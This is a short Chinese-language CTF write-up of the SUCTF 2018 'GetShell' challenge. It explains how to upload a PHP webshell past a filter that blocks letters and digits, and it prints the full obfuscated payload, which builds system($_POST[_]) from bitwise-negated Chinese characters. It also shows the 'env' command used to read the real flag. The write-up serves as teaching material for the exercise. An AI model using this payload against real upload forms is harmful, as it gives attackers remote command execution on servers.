[SUCTF 2018]GetShell --不会编程的崽

本文讲述了在无数字和字母限制的上传场景中,如何利用PHP代码技巧绕过文件内容检查,尤其是数组操作和取反原理的应用。最终,真正的旗标隐藏在环境变量中,提示读者关注环境变量作为安全漏洞的一种突破点。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

这题的难点在于无数字无字母上传木马。难道是命令执行吗?哎,是文件上传,不过知识点通用。看下界面吧

 要么后台文件扫描,要么右键源代码。还算源代码简单一些

给了一部分源码。大致意思是,它会检查文件内容,除前五个字符外。黑名单并没有给出,但是这里fuzz后大概就剩这几个字符了。

$ ( ) . ; = [ ] _~ 

"~"没有过滤,大概是取反了,但是没%,所以应该是自增与取反的结合。我也是看的大佬的代码确实妙啊

<?php
$_=[]; //array
$__=$_.$_; //arrayarray
$_=($_==$__);//$_=(array==arrayarray)明显不相同 false 0
$__=($_==$_);//$__=(1==1) 相同返回1

$___ = ~区[$__].~冈[$__].~区[$__].~勺[$__].~皮[$__].~针[$__];//system
$____ = ~码[$__].~寸[$__].~小[$__].~欠[$__].~立[$__];//_POST


$___($$____[_]);//也就是system($_POST[_])
使用<?=代替<?php
payload:<?=$_=[];$__=$_.$_;$_=($_==$__);$__=($_==$_);$___=~区[$__].~冈[$__].~区[$__].~勺[$__].~皮[$__].~针[$__];$____=~码[$__].~寸[$__].~小[$__].~欠[$__].~立[$__];$___($$____[_]);

 取反的原理:

 直接上传

使用post请求该数据包即可

 

 看见左边的flag了,没错,但是是假的

 真正的flag在环境变量里,具体怎么知道的,看别人writeup知道的

_=env

 主要还算无数字无字母的绕过

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值